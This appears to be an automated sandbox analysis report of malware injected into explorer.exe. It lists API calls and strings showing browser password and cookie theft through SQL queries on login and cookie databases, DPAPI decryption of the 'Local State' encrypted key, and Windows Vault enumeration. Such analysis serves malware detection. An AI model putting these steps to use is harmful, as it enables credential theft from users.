c1b6a 2 API calls 27993->27994 27995 c3c50 27994->27995 27996 c3dfa 27995->27996 28029 c1000 GetProcessHeap RtlAllocateHeap 27995->28029 27998 c3c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28030 114bec 27998->28030 28000 c3dec DeleteFileW 28001 c1011 3 API calls 28000->28001 28001->27996 28002 c3c9a 28002->28000 28003 c3de3 28002->28003 28041 c1000 GetProcessHeap RtlAllocateHeap 28002->28041 28049 113848 67 API calls 28003->28049 28006 c3cce 28042 e02ec 85 API calls 28006->28042 28008 c3da8 28045 dfb92 84 API calls 28008->28045 28010 c3db1 lstrlen 28011 c3ddc 28010->28011 28012 c3db9 28010->28012 28015 c1011 3 API calls 28011->28015 28046 c1798 lstrlen 28012->28046 28013 c1fa7 19 API calls 28022 c3cd9 28013->28022 28015->28003 28016 c3dc8 28047 c1798 lstrlen 28016->28047 28017 c3d2b lstrlen 28019 c3d35 lstrlen 28017->28019 28017->28022 28019->28022 28020 c3dd2 28048 c1798 lstrlen 28020->28048 28022->28008 28022->28013 28022->28017 28043 c1000 GetProcessHeap RtlAllocateHeap 28022->28043 28044 e02ec 85 API calls 28022->28044 28025 c3d46 wsprintfA lstrlen 28026 c3d71 28025->28026 28027 c3d83 lstrcat 28025->28027 28026->28027 28028 c1011 3 API calls 28027->28028 28028->28022 28029->27998 28050 11307c 28030->28050 28032 114c01 28040 114c44 28032->28040 28060 dc54d memset 28032->28060 28034 114c18 28061 dc871 21 API calls 28034->28061 28036 114c2a 28062 dc518 19 API calls 28036->28062 28038 114c33 28038->28040 28063 11486f 80 API calls 28038->28063 28040->28002 28041->28006 28042->28022 28043->28025 28044->28022 28045->28010 28046->28016 28047->28020 28048->28011 28049->28000 28051 113095 28050->28051 28059 11308e 28050->28059 28052 1130ad 28051->28052 28077 c66ce 17 API calls 28051->28077 28054 1130ed memset 28052->28054 28052->28059 28055 113108 28054->28055 28056 113116 28055->28056 28078 cc59d 17 API calls 28055->28078 28056->28059 28064 c6512 28056->28064 28059->28032 28060->28034 28061->28036 28062->28038 28063->28040 28079 c685c 28064->28079 28066 
c651d 28066->28059 28067 c6519 28067->28066 28068 cbfec GetSystemInfo 28067->28068 28082 c65bd 28068->28082 28070 cc00e 28071 c65bd 16 API calls 28070->28071 28072 cc01a 28071->28072 28073 c65bd 16 API calls 28072->28073 28074 cc026 28073->28074 28075 c65bd 16 API calls 28074->28075 28076 cc032 28075->28076 28076->28059 28077->28052 28078->28056 28080 11307c 17 API calls 28079->28080 28081 c6861 28080->28081 28081->28067 28083 11307c 17 API calls 28082->28083 28084 c65c2 28083->28084 28084->28070 28352 c4440 24 API calls 28353 e6440 85 API calls 28085 c105d VirtualFree 28456 129238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28457 c5e5a 28 API calls 28355 c4c6d 17 API calls 28459 f3e6b 20 API calls 28357 df86a 32 API calls 28358 11507d 24 API calls 28360 d807c 23 API calls 28362 102864 25 API calls 28463 e0670 _allmul _allmul _allmul _alldvrm 28466 d0284 26 API calls 28368 102c9e 96 API calls 28469 e069d _allmul 28168 c3098 28169 c1b6a 2 API calls 28168->28169 28170 c30af 28169->28170 28176 c33a9 28170->28176 28192 c1000 GetProcessHeap RtlAllocateHeap 28170->28192 28172 c30ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28173 114bec 80 API calls 28172->28173 28177 c3126 28173->28177 28174 c339b DeleteFileW 28175 c1011 3 API calls 28174->28175 28175->28176 28177->28174 28178 c3392 28177->28178 28193 e02ec 85 API calls 28177->28193 28197 113848 67 API calls 28178->28197 28181 c3381 28196 dfb92 84 API calls 28181->28196 28183 c319c RtlCompareMemory 28184 c32cd CryptUnprotectData 28183->28184 28191 c3155 28183->28191 28184->28191 28186 c31d0 RtlZeroMemory 28194 c1000 GetProcessHeap RtlAllocateHeap 28186->28194 28188 c1011 3 API calls 28188->28191 28189 c1fa7 19 API calls 28189->28191 28190 c1798 lstrlen 28190->28191 28191->28181 28191->28183 28191->28184 28191->28186 28191->28188 28191->28189 28191->28190 28195 e02ec 85 API calls 28191->28195 28192->28172 28193->28191 28194->28191 28195->28191 28196->28178 28197->28174 28470 d6698 31 API calls 
28471 c629a 23 API calls 28374 10348f 27 API calls 28376 db0aa 75 API calls 27934 c24a4 27937 c2198 RtlZeroMemory GetVersionExW 27934->27937 27938 c21cb LoadLibraryW 27937->27938 27940 c21fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27938->27940 27941 c249b 27938->27941 27942 c2492 FreeLibrary 27940->27942 27950 c2244 27940->27950 27942->27941 27943 c247b 27943->27942 27944 c2365 RtlCompareMemory 27944->27950 27945 c22e1 RtlCompareMemory 27945->27950 27946 c1953 6 API calls 27946->27950 27947 c1011 GetProcessHeap HeapFree VirtualQuery 27947->27950 27948 c23f8 StrStrIW 27948->27950 27949 c17c0 9 API calls 27949->27950 27950->27942 27950->27943 27950->27944 27950->27945 27950->27946 27950->27947 27950->27948 27950->27949 27954 c2ea5 25 API calls 27988 c9ea7 RtlAllocateHeap 27989 c9ed9 27988->27989 27990 c9ec1 27988->27990 27992 c7f70 17 API calls 27990->27992 27992->27989 28377 db8a6 81 API calls 28475 c56a2 _allrem 28476 c96bc _alldiv _alldiv _alldiv _alldiv _allmul 28378 d78b9 34 API calls 28478 e12bb _allmul _allmul _allmul _alldvrm _allmul 28379 e13ca 78 API calls 28480 e13ca 80 API calls 28380 c2cb5 16 API calls 28381 c6eb7 24 API calls 28382 c48b1 22 API calls 28482 efaca _allmul strcspn 28384 c6eb7 22 API calls 28385 d5cca 33 API calls 28386 c5cc5 22 API calls 28387 f70de 24 API calls 28487 ec6da 23 API calls 28391 1134ca 48 API calls 28394 cf4ec 20 API calls 27921 c9ee8 27922 c9ef1 HeapFree 27921->27922 27925 c9f1a 27921->27925 27923 c9f02 27922->27923 27922->27925 27926 c7f70 17 API calls 27923->27926 27926->27925 28396 c28f8 101 API calls 28491 e13ca 79 API calls 28397 c4cf5 memset 28492 f9ef6 105 API calls 28398 e13ca 80 API calls 27741 c4108 27744 c4045 27741->27744 27763 c3fdc 27744->27763 27747 c3fdc 50 API calls 27748 c407a 27747->27748 27749 c3fdc 50 API calls 27748->27749 27750 c408d 27749->27750 27751 c3fdc 50 API calls 27750->27751 27752 c40a0 27751->27752 27753 c3fdc 50 API calls 27752->27753 27754 c40b3 
27753->27754 27755 c3fdc 50 API calls 27754->27755 27756 c40c6 27755->27756 27757 c3fdc 50 API calls 27756->27757 27758 c40d9 27757->27758 27759 c3fdc 50 API calls 27758->27759 27760 c40ec 27759->27760 27761 c3fdc 50 API calls 27760->27761 27762 c40ff 27761->27762 27774 c1afe 27763->27774 27766 c403f 27766->27747 27771 c4038 27837 c1011 27771->27837 27842 c1000 GetProcessHeap RtlAllocateHeap 27774->27842 27776 c1b0d SHGetFolderPathW 27777 c1b63 27776->27777 27778 c1b20 27776->27778 27777->27766 27782 c199d 27777->27782 27779 c1011 3 API calls 27778->27779 27781 c1b28 27779->27781 27781->27777 27843 c19e5 27781->27843 27858 c1953 27782->27858 27784 c19a6 27785 c1011 3 API calls 27784->27785 27786 c19af 27785->27786 27787 c3ed9 27786->27787 27788 c3eed 27787->27788 27789 c3fd1 27787->27789 27788->27789 27864 c1000 GetProcessHeap RtlAllocateHeap 27788->27864 27789->27771 27809 c1d4a 27789->27809 27791 c3f01 PathCombineW FindFirstFileW 27792 c3fca 27791->27792 27793 c3f27 27791->27793 27796 c1011 3 API calls 27792->27796 27794 c3f78 lstrcmpiW 27793->27794 27795 c3f32 lstrcmpiW 27793->27795 27865 c1000 GetProcessHeap RtlAllocateHeap 27793->27865 27794->27793 27797 c3faf FindNextFileW 27794->27797 27795->27797 27798 c3f42 lstrcmpiW 27795->27798 27796->27789 27797->27793 27800 c3fc3 FindClose 27797->27800 27798->27797 27801 c3f56 27798->27801 27800->27792 27882 c1000 GetProcessHeap RtlAllocateHeap 27801->27882 27802 c3f92 PathCombineW 27866 c3e04 27802->27866 27805 c3f60 PathCombineW 27807 c3ed9 23 API calls 27805->27807 27806 c3f76 27808 c1011 3 API calls 27806->27808 27807->27806 27808->27797 27810 c1eb4 27809->27810 27811 c1d62 27809->27811 27810->27771 27811->27810 27914 c19b4 27811->27914 27814 c1d79 27816 c1953 6 API calls 27814->27816 27815 c1d8b 27817 c1953 6 API calls 27815->27817 27818 c1d83 27816->27818 27817->27818 27818->27810 27819 c1da3 FindFirstFileW 27818->27819 27820 c1ead 27819->27820 27827 c1dba 27819->27827 27821 c1011 3 API calls 27820->27821 
27821->27810 27822 c1dc5 lstrcmpiW 27824 c1ddd lstrcmpiW 27822->27824 27825 c1e8e FindNextFileW 27822->27825 27823 c1953 6 API calls 27823->27827 27824->27825 27834 c1df5 27824->27834 27826 c1ea2 FindClose 27825->27826 27825->27827 27826->27820 27827->27822 27827->27823 27828 c199d 9 API calls 27827->27828 27830 c1e54 lstrcmpiW 27828->27830 27829 c19b4 lstrlenW 27829->27834 27830->27834 27831 c1011 3 API calls 27831->27825 27833 c1953 6 API calls 27833->27834 27834->27829 27834->27831 27834->27833 27835 c199d 9 API calls 27834->27835 27836 c1d4a 12 API calls 27834->27836 27918 c1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27834->27918 27835->27834 27836->27834 27919 c1162 VirtualQuery 27837->27919 27840 c102d 27840->27766 27841 c101d GetProcessHeap HeapFree 27841->27840 27842->27776 27844 c19fa RegOpenKeyExW 27843->27844 27845 c19f7 27843->27845 27846 c1a28 RegQueryValueExW 27844->27846 27847 c1aa2 27844->27847 27845->27844 27849 c1a94 RegCloseKey 27846->27849 27850 c1a46 27846->27850 27848 c1ab9 27847->27848 27851 c19e5 5 API calls 27847->27851 27848->27781 27849->27847 27849->27848 27850->27849 27857 c1000 GetProcessHeap RtlAllocateHeap 27850->27857 27851->27848 27853 c1a61 RegQueryValueExW 27854 c1a7f 27853->27854 27855 c1a8b 27853->27855 27854->27849 27856 c1011 3 API calls 27855->27856 27856->27854 27857->27853 27859 c1964 lstrlenW lstrlenW 27858->27859 27863 c1000 GetProcessHeap RtlAllocateHeap 27859->27863 27862 c1986 lstrcatW lstrcatW 27862->27784 27863->27862 27864->27791 27865->27802 27883 c1b6a 27866->27883 27868 c3e0f 27873 c3ec7 27868->27873 27889 c1c31 CreateFileW 27868->27889 27873->27806 27876 c3ebf 27877 c1011 3 API calls 27876->27877 27877->27873 27878 c3e6c RtlCompareMemory 27879 c3ea8 27878->27879 27880 c3e7e CryptUnprotectData 27878->27880 27881 c1011 3 API calls 27879->27881 27880->27879 27881->27876 27882->27805 27884 c1b6f 27883->27884 27885 c1b99 27883->27885 27884->27885 27886 c1b76 CreateFileW 27884->27886 27885->27868 
27887 c1b8d CloseHandle 27886->27887 27888 c1b95 27886->27888 27887->27888 27888->27868 27890 c1c98 27889->27890 27891 c1c53 GetFileSize 27889->27891 27890->27873 27899 c2fb1 27890->27899 27892 c1c90 CloseHandle 27891->27892 27893 c1c63 27891->27893 27892->27890 27911 c1000 GetProcessHeap RtlAllocateHeap 27893->27911 27895 c1c6b ReadFile 27896 c1c80 27895->27896 27896->27892 27897 c1011 3 API calls 27896->27897 27898 c1c8e 27897->27898 27898->27892 27900 c2fb8 StrStrIA 27899->27900 27902 c2ff2 27899->27902 27901 c2fcd lstrlen StrStrIA 27900->27901 27900->27902 27901->27902 27903 c2fe7 27901->27903 27902->27873 27905 c123b lstrlen 27902->27905 27912 c190b 6 API calls 27903->27912 27906 c129b 27905->27906 27907 c1256 CryptStringToBinaryA 27905->27907 27906->27876 27906->27878 27906->27879 27907->27906 27908 c1272 27907->27908 27913 c1000 GetProcessHeap RtlAllocateHeap 27908->27913 27910 c127e CryptStringToBinaryA 27910->27906 27911->27895 27912->27902 27913->27910 27915 c19bc 27914->27915 27917 c19d4 27914->27917 27916 c19c3 lstrlenW 27915->27916 27915->27917 27916->27917 27917->27814 27917->27815 27918->27834 27920 c1019 27919->27920 27920->27840 27920->27841 28494 e5f08 93 API calls 28400 114116 30 API calls 28496 f6f06 24 API calls 28401 d84a7 31 API calls 28228 129304 28230 129344 28228->28230 28229 129584 28229->28229 28230->28229 28231 1294da LoadLibraryA 28230->28231 28235 12951f VirtualProtect VirtualProtect 28230->28235 28232 1294f1 28231->28232 28232->28230 28234 129503 GetProcAddress 28232->28234 28234->28232 28236 129519 28234->28236 28235->28229 28253 c411b 28254 c4045 50 API calls 28253->28254 28255 c412b 28254->28255 28256 c4045 50 API calls 28255->28256 28257 c413b 28256->28257 28500 c2b15 50 API calls 28501 e6b14 memset memcpy _allmul 28261 c3717 28262 c1b6a 2 API calls 28261->28262 28263 c372e 28262->28263 28264 c3c23 28263->28264 28311 c1000 GetProcessHeap RtlAllocateHeap 28263->28311 28266 c376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 
                                                        Control-flow graph edge list (continued from the preceding section, covering several functions); graph data not reproduced here, the per-function API lists below carry the call information.

                                                        Control-flow Graph (legend: Executed / Not Executed) for the function at c3717; graph node and edge data not reproduced.
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3778
                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3782
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 000C3789
                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3794
                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 000C383B
                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 000C3870
                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 000C398B
                                                        • lstrlen.KERNEL32(00000000), ref: 000C399A
                                                        • wsprintfA.USER32 ref: 000C39F1
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 000C39FD
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C3A21
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3A49
                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000C3B13
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3B22
                                                        • wsprintfA.USER32 ref: 000C3B79
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3B85
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C3BA9
                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3BDA
                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C3C16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                        • API String ID: 584740257-404540950
                                                        • Opcode ID: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                        • Instruction ID: c2bd5664ae81c03ce275280e3603a140813cffa0008f9f19c02a5d8c1c7d7917
                                                        • Opcode Fuzzy Hash: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                        • Instruction Fuzzy Hash: 40E19870218341AFD725DF24C984FAFBBE9AF89344F04882CF585862A2DB76CD45CB52

                                                        Control-flow Graph (legend: Executed / Not Executed) for the function at c2198; graph node and edge data not reproduced.
                                                        APIs
                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 000C21AF
                                                        • GetVersionExW.KERNEL32(?), ref: 000C21BE
                                                        • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000C21E8
                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 000C220A
                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 000C2214
                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 000C2220
                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 000C222A
                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 000C2236
                                                        • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C22E8
                                                        • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C236C
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000C23FE
                                                        • FreeLibrary.KERNELBASE(00000000), ref: 000C2493
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                        • API String ID: 2583887280-2831467701
                                                        • Opcode ID: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                        • Instruction ID: 494c01f336fce24a4fdd702bd81126ed0909a159fbcac44f9df4693bfcb951b3
                                                        • Opcode Fuzzy Hash: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                        • Instruction Fuzzy Hash: 00919B71A083049FD718DF65C884FAFBBEAAF98304F00882DF98597252EB71D841CB52

                                                        Control-flow Graph (legend: Executed / Not Executed) for the function at c3098; graph node and edge data not reproduced.
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C30F9
                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3103
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 000C310A
                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3115
                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000C31A4
                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 000C31D7
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C32DF
                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C339C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                        • API String ID: 2757140130-4052020286
                                                        • Opcode ID: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                        • Instruction ID: 7d893e13d2ced862851d02a0f1a8131389b44376dc6ecc335188d734be133e5c
                                                        • Opcode Fuzzy Hash: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                        • Instruction Fuzzy Hash: C2919A31218381ABDB149F24C844FAFBBE9AFC5744F04892CF58596292DB35DE45CB52

                                                        Control-flow Graph (legend: Executed / Not Executed) for the function at c3ed9; graph node and edge data not reproduced.
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000C3F0A
                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C3F16
                                                        • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C3F38
                                                        • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C3F4C
                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F69
                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 000C3F7E
                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F9B
                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C3FB5
                                                        • FindClose.KERNELBASE(00000000), ref: 000C3FC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                        • String ID: *.*$Local State
                                                        • API String ID: 3923353463-3324723383
                                                        • Opcode ID: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                        • Instruction ID: 426f7e9a24056e881f0cc7fd89408b911b13c3a2952814074d4836fd1ca5a86e
                                                        • Opcode Fuzzy Hash: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                        • Instruction Fuzzy Hash: 6121B0306003447BD758AB709C48FEF76BC9BC6341F14893DF816C2193EBBA8A898661

                                                        Control-flow Graph (legend: Executed / Not Executed) for the function at c1d4a; graph node and edge data not reproduced.
                                                        APIs
                                                          • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C1DA9
                                                        • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C1DCF
                                                        • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C1DE7
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 000C1E62
                                                          • Part of subcall function 000C1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2C27), ref: 000C1D02
                                                          • Part of subcall function 000C1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 000C1D0D
                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C1E94
                                                        • FindClose.KERNELBASE(00000000), ref: 000C1EA3
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                        • String ID: *.*$\*.*
                                                        • API String ID: 232625764-1692270452
                                                        • Opcode ID: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                        • Instruction ID: 18202571e4568279dd00b231e5bad336ff062d80cfc7ef8d9098c242816cd79d
                                                        • Opcode Fuzzy Hash: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                        • Instruction Fuzzy Hash: A931A2307083419BDB64EB749998FEF76EA9FC6340F004A2DF84AC2253EB758C459652

                                                        Control-flow Graph (legend: Executed / Not Executed) for the function at c3e04; graph node and edge data not reproduced.
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                          • Part of subcall function 000C1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                          • Part of subcall function 000C1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                          • Part of subcall function 000C1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                          • Part of subcall function 000C1C31: CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                          • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                          • Part of subcall function 000C2FB1: lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                          • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                          • Part of subcall function 000C123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000C3E4B,00000000), ref: 000C124A
                                                          • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1268
                                                          • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1295
                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 000C3E74
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3E9E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                        • String ID: $DPAP$DPAP$IDPAP
                                                        • API String ID: 3076719866-957854035
                                                        • Opcode ID: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                        • Instruction ID: 1247902a791fece0136aa602f9ff097b9321c40bf4286bc784f5f2b7437e54bc
                                                        • Opcode Fuzzy Hash: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                        • Instruction Fuzzy Hash: 9D2181726143456BD725EB688C80FFFB2EDAB95700F44492DF841C7282EB74CE498796
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.0000000000127000.00000040.80000000.00040000.00000000.sdmp, Offset: 00127000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_127000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                        • Instruction ID: f8f956276b81556480b3c1b19405860d93c04e5a3b5c81f61446289dd2956c78
                                                        • Opcode Fuzzy Hash: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                        • Instruction Fuzzy Hash: 6BA15AB2A143A25FDB259E7CEDD06A07BA0FB52324F2D066DC5D1CB2C2E7605817C751
                                                        APIs
                                                          • Part of subcall function 000C1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C116F
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C4BB6
                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 000C4BBF
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                        • String ID:
                                                        • API String ID: 1675517319-0
                                                        • Opcode ID: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                        • Instruction ID: da5cb47bbe52387c3e0a1681ea9d7598d9257fffee12612a3050b05896cbbd2f
                                                        • Opcode Fuzzy Hash: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                        • Instruction Fuzzy Hash: 35E048319052106BC758BB70BD69FDF3B99AF96361F20C91DB26592492CB36CC818660
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
